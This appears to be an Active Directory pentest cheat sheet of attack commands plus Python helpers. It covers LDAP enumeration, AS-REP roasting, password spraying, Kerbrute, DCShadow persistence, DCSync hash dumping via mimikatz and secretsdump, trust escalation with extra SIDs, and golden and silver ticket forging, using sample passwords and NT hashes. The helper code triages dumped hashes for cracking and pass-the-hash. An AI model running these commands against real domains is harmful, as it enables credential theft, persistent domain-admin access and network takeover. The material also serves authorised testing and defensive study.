# AD Related

![](https://pbs.twimg.com/media/CNiCKDaUwAAPXqD?format=jpg\&name=900x900)

## Enumeration

Basic LDAP (and SMB/RPC) enumeration with a low-privileged domain account

* <https://github.com/cddmp/enum4linux-ng>
* <https://github.com/ropnop/windapsearch>
* <https://github.com/CroweCybersecurity/ad-ldap-enum>

```bash
python3 /opt/enum4linux-ng/enum4linux-ng.py -A 1.3.3.7 -p Password123 -u morph3
python windapsearch.py -u morph3 -p morph3 -d evil.corp --dc-ip 192.168.1.2
python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rd
```

## LDAP Queries

Get all the users (the computer class derives from user, so `(objectClass=user)` alone also returns machine accounts; restrict to `objectCategory=person`)

```
Get-ADUser -LDAPFilter "(&(objectCategory=person)(objectClass=user))"
```

Dump the whole directory (subtree search from the domain root) over LDAPS; `LDAPTLS_REQCERT=never` skips certificate validation because DCs usually present a self-signed or internal-CA certificate

```
export LDAPTLS_REQCERT=never
ldapsearch -LLL -x -H ldaps://dc.foobar.local -b 'dc=foobar,dc=local' -s sub '(objectclass=*)' -D 'test@foobar.local' -w foobar
```

## AS-Rep Roasting

If a user has Kerberos pre-authentication disabled (`DONT_REQ_PREAUTH` in `userAccountControl`), anyone can request an AS-REP for that account and crack its encrypted part offline; `-format hashcat` emits `$krb5asrep$23$...` lines for hashcat mode 18200. Without credentials you can only try a list of candidate usernames:

```
impacket-GetNPUsers ecorp.local/ -format hashcat -usersfile ./users -dc-ip 10.3.3.7
```
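The LDAP Queries and AS-REP Roasting sections above both come down to a handful of `userAccountControl` bit tests. As an added example (not part of the original notes, and not code from any of the tools listed), here are the filters those tools send, plus a small parser for `ldapsearch -LLL` output that picks the AS-REP roastable and Kerberoastable accounts out of a full dump. The LDIF sample, account names and values are constructed.

```python
"""Added example, not part of the original notes: LDAP filters for AD triage and
a parser for `ldapsearch -LLL` output. SAMPLE_LDIF below is constructed."""

import base64

# userAccountControl bits (values from the AD schema), only those worth triaging
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
BIT_AND = "1.2.840.113556.1.4.803"  # LDAP_MATCHING_RULE_BIT_AND
# computer derives from user, so objectClass=user alone also matches machines
PERSON = "(objectCategory=person)(objectClass=user)"


def uac_filter(bit, on=True):
    """Bitwise test on userAccountControl, negated when on=False."""
    f = f"(userAccountControl:{BIT_AND}:={bit})"
    return f if on else f"(!{f})"


FILTERS = {
    "users": f"(&{PERSON})",
    "asrep_roastable": f"(&{PERSON}{uac_filter(0x400000)}{uac_filter(0x2, on=False)})",
    "kerberoastable": f"(&{PERSON}(servicePrincipalName=*)(!(sAMAccountName=krbtgt))"
                      f"{uac_filter(0x2, on=False)})",
    "unconstrained_delegation": f"(&{uac_filter(0x80000)}(!(primaryGroupID=516)))",  # 516 = DCs
}


def decode_uac(value):
    """Names of the flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def parse_ldif(text):
    """Parse ldapsearch -LLL output: blank-line separated entries, `attr: value`
    lines, `attr:: base64` lines and continuation lines starting with a space."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]  # unfold a wrapped value
        else:
            lines.append(raw)
    entries, cur = [], {}
    for line in lines:
        if not line.strip():
            if cur:
                entries.append(cur)
            cur = {}
            continue
        if line.startswith("#"):
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        cur.setdefault(attr, []).append(value.strip())
    if cur:
        entries.append(cur)
    return entries


def _uac(e):
    return int(e.get("userAccountControl", ["0"])[0])


def _is_user(e):
    classes = e.get("objectClass", [])
    return "user" in classes and "computer" not in classes


def asrep_roastable(entries):
    """Enabled user accounts with DONT_REQ_PREAUTH set."""
    return [e["sAMAccountName"][0] for e in entries
            if _is_user(e) and _uac(e) & 0x400000 and not _uac(e) & 0x2]


def kerberoastable(entries):
    """Enabled user accounts with an SPN (krbtgt excluded)."""
    return [e["sAMAccountName"][0] for e in entries
            if _is_user(e) and "servicePrincipalName" in e
            and e["sAMAccountName"][0].lower() != "krbtgt" and not _uac(e) & 0x2]


# Constructed dump: one roastable user, one SPN account, one disabled
# pre-auth-less user and one workstation (which must be ignored).
SAMPLE_LDIF = """\
dn: CN=morph3,OU=Users,DC=ecorp,DC=local
objectClass: user
sAMAccountName: morph3
userAccountControl: 4260352

dn: CN=svc_sql,OU=Users,DC=ecorp,DC=local
objectClass: user
sAMAccountName: svc_sql
servicePrincipalName: MSSQLSvc/dc1.ecorp.l
 ocal:1433
userAccountControl: 66048

dn: CN=old_user,OU=Users,DC=ecorp,DC=local
objectClass: user
sAMAccountName: old_user
userAccountControl: 4194818

dn: CN=WS01,OU=Computers,DC=ecorp,DC=local
objectClass: user
objectClass: computer
sAMAccountName: WS01$
servicePrincipalName: HOST/ws01.ecorp.local
userAccountControl: 4096
"""
```

`FILTERS["asrep_roastable"]` is what you would pass to `ldapsearch` or `Get-ADUser -LDAPFilter` to get a usersfile for GetNPUsers; against a full dump, `asrep_roastable(parse_ldif(text))` answers the same question offline without a second query.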

## Bruteforcing - Password Spraying

* <https://github.com/dafthack/DomainPasswordSpray>

Spray one password (or a short list) across every user instead of many passwords against one account, and check the lockout threshold and observation window first: the script reads the domain policy and warns, but it is still your attempts that lock accounts.

```powershell
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
```

## Kerbrute

Kerberos (port 88) brute forcing. `userenum` needs no credentials: a valid name gets a pre-authentication-required error (or a crackable AS-REP when pre-auth is off) while an unknown one gets `KDC_ERR_C_PRINCIPAL_UNKNOWN`. A wrong password is a 4771 on the DC and counts towards the lockout threshold just like an NTLM failure.

* <https://github.com/ropnop/kerbrute>
* <https://github.com/ropnop/kerbrute/releases/tag/v1.0.3>

```
# Password brute
./kerbrute_linux_amd64 bruteuser -d evil.corp --dc 192.168.1.2 rockyou.txt morph3

# Username brute
./kerbrute_linux_amd64 userenum -d evil.corp --dc 192.168.1.2 users.txt

# Password spray
./kerbrute_linux_amd64 passwordspray -d evil.corp --dc 192.168.1.2 users.txt rockyou.txt
```

## DC Shadow

* <https://attack.stealthbits.com/how-dcshadow-persistence-attack-works>

-This is a persistence attack-

DCShadow registers a rogue Domain Controller (an nTDSDSA object and the matching SPNs in the Configuration partition) and pushes attribute changes into AD through normal replication, so the receiving DC stores them as replicated data rather than as a logged directory write. The usual goal is to put a privileged SID into a low-privileged account's `sidHistory`; setting this up already needs Domain Admin (or equivalent) rights, which is why it is persistence and not escalation.

Find the SID of the account whose privileges you want to inherit (here the domain Administrator)

```
wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid
```

This registers the rogue DC and starts an RPC server waiting for a replication request (run this mimikatz as SYSTEM; replace `sid` with the value found above)

```
lsadump::dcshadow /object:"CN=morph3,OU=Business,OU=Users,OU=ECORP,DC=ECORP,DC=local" /attribute:sidhistory /value:sid
```

Run this from a second mimikatz running as Domain Admin; it triggers the replication, after which the first instance unregisters the rogue DC

```
lsadump::dcshadow /push
```

Log in again so the new `sidHistory` ends up in your token, then DCSync

```
lsadump::dcsync /domain:ECORP.local /user:krbtgt
```

## DC Sync

Using mimikatz. DCSync asks a DC for replication data over DRSUAPI (MS-DRSR), so it works from any host with an account holding `Replicating Directory Changes` and `Replicating Directory Changes All` on the domain object (Domain Admins, Enterprise Admins and DC computer accounts by default). The signal for a defender is event 4662 on the domain object with the DS-Replication-Get-Changes-All GUID `1131f6ad-9c07-11d1-f79f-00c04fc2dcd2` from anything that is not a DC,

```
lsadump::dcsync /domain:domain /all /csv
lsadump::dcsync /user:krbtgt
```

Using Invoke-DCSync.ps1,

* <https://gist.github.com/monoxgas/9d238accd969550136db>

```powershell
powershell.exe -c "Import-Module .\Invoke-DCSync.ps1; Invoke-DCSync -PWDumpFormat"
```

Using secretsdump from impacket (`-hashes` takes `LM:NT`, where `aad3b435b51404eeaad3b435b51404ee` is the LM hash of an empty password, i.e. LM storage disabled; `-just-dc` limits the dump to the NTDS secrets over DRSUAPI; the second form works offline from a copied ntds.dit plus the SYSTEM hive that holds its bootkey),

```bash
python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
python secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit LOCAL
impacket-secretsdump morph3@10.11.1.75
```
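Whichever of the three DCSync methods you use, the output ends up as `user:rid:lmhash:nthash:::` lines, and the first thing to do with a domain dump is triage it. As an added example (not part of the original notes, and not impacket code) the parser below reads secretsdump-style output and reports the krbtgt hash, accounts sharing an NT hash, accounts that still have an LM hash and accounts with an empty password. The dump is constructed: apart from the well-known empty LM/NT hashes and the LM/NT hashes of `password`, every value is made up.

```python
"""Added example, not part of the original notes and not impacket code: parse
and triage secretsdump output. SAMPLE_DUMP below is constructed."""

import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# `domain\user:rid:lm:nt:::`; the domain prefix is optional (builtins lack it)
HASH_LINE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
)


def parse_secretsdump(text):
    """One dict per hash line; `[*]` status and Kerberos key lines do not match."""
    creds = []
    for line in text.splitlines():
        m = HASH_LINE.match(line.strip())
        if m:
            c = m.groupdict()
            c["rid"] = int(c["rid"])
            c["lm"], c["nt"] = c["lm"].lower(), c["nt"].lower()
            creds.append(c)
    return creds


def triage(creds):
    by_nt = defaultdict(list)
    for c in creds:
        by_nt[c["nt"]].append(c["user"])
    return {
        "krbtgt": next((c["nt"] for c in creds if c["user"].lower() == "krbtgt"), None),
        "empty_password": [c["user"] for c in creds if c["nt"] == EMPTY_NT],
        "lm_present": [c["user"] for c in creds if c["lm"] != EMPTY_LM],
        # same NT hash == same password; cracking one gives you all of them
        "shared_nt": {h: u for h, u in by_nt.items() if len(u) > 1 and h != EMPTY_NT},
        "machine_accounts": [c["user"] for c in creds if c["user"].endswith("$")],
    }


def hashes_arg(nt, lm=EMPTY_LM):
    """The LM:NT value impacket's -hashes expects for pass-the-hash."""
    return f"{lm}:{nt}"


def hashcat_lines(creds):
    """user:nt lines for `hashcat -m 1000 --username`; machine account
    passwords are random, so they are left out."""
    return [f"{c['user']}:{c['nt']}" for c in creds if not c["user"].endswith("$")]


SAMPLE_DUMP = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3f1e6b9c2d4e5f60718293a4b5c6d7e:::
ecorp.local\morph3:1105:aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9:::
ecorp.local\svc_sql:1106:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:9b6c1f3a8d2e4c5b7a9f0e1d2c3b4a5968778695a4b3c2d1e0f9a8b7c6d5e4f3
"""

if __name__ == "__main__":
    for k, v in triage(parse_secretsdump(SAMPLE_DUMP)).items():
        print(f"{k}: {v}")
```

In the constructed dump `morph3` shares the Administrator's NT hash, which is the kind of reuse that turns one cracked password into a domain admin; `hashes_arg()` builds the `-hashes` value for the secretsdump and psexec style commands above.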

## Domain Trust

Map the trusts with PowerView

```
get-domaintrustmapping
```

Child-to-parent escalation inside one forest: forge a golden ticket in the current (child) domain and put the parent domain's Enterprise Admins SID (`<target_domain_sid>-519`) into the extra SIDs, which land in the PAC as SID history. `Get-DomainSID` gives the current domain's SID and `Get-DomainSID -Domain <target>` the target's. SID filtering would strip that extra SID, but it is off by default for trusts within a forest and on for forest trusts, so this works child to parent and not across forests.

```
kerberos::golden /user:Administrator /domain:<curr_domain> /sid:<curr_domain_sid> /krbtgt:<curr_domain_krbtgt_hash> /sids:<target_domain_sid>-519 /ptt
```

## Golden Ticket

With the krbtgt account's NT hash (or AES key) you can forge a TGT for any user with any group membership, and every DC in the domain will accept it until the krbtgt password has been rotated twice.

Get the krbtgt hash with DCSync,

```
lsadump::dcsync /all /csv
```

Or, with a shell on the DC itself, read the hashes straight out of LSA (`/patch` patches the running LSASS instead of injecting into it; `lsadump::trust` gives the trust keys used for inter-domain tickets)

```
lsadump::lsa /patch
lsadump::trust /patch
```

Forging the ticket

* /rc4 or /krbtgt -> krbtgt NT hash (`/aes256` takes the AES key instead, which looks less out of place than an RC4 ticket)
* /sid -> domain SID from Get-DomainSID
* /user and /id -> account name and RID; pick an existing account, since DCs with the November 2021 PAC hardening (CVE-2021-42287) enforced reject tickets for users that do not exist
* /ticket -> optional, output file (default ticket.kirbi)
* /groups -> optional, group RIDs placed in the PAC; default 513,512,520,518,519 (Domain Users, Domain Admins, Group Policy Creator Owners, Schema Admins, Enterprise Admins)
* /ptt -> inject the ticket into the current session instead of writing it to disk

```
kerberos::golden /user:morph3 /domain:evil.corp /sid:domains-sid /krbtgt:krbtgt-hash /ticket:ticket.kirbi /groups:513,512,520,518,519
kerberos::ptt ticket.kirbi
```

After this the ticket is in your session. You can verify that it is in your cache with

```
klist
```

You can now verify it is working.

```
dir \\DC\C$
psexec.exe \\DC cmd.exe
```

Purge it when done

```
kerberos::purge 
```

If you want to use metasploit

```
post/windows/escalate/golden_ticket 
```

## Silver Ticket

A silver ticket is a forged service ticket (TGS) for one SPN, encrypted with that service account's NT hash or AES key instead of krbtgt's. The DC is never contacted, so no TGS request for it shows up there, but it only works against services that do not validate the PAC with the DC. In the ticketer command the positional user (`ksimpson`) is who the ticket claims to be, `-nthash` is the hash of the account running the service (here `sqlsvc`), and `-user`/`-password` only matter together with `-request`. ticketer writes `ksimpson.ccache`, which you point `KRB5CCNAME` at before using the impacket tools.

ticketer,

```
python3 /opt/impacket/examples/ticketer.py -domain scrm.local -user sqlsvc -password Pegasus60 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 ksimpson -spn MSSQLSvc/dc1.scrm.local -nthash B999A16500B87D17EC7F2E2A68778F05
```

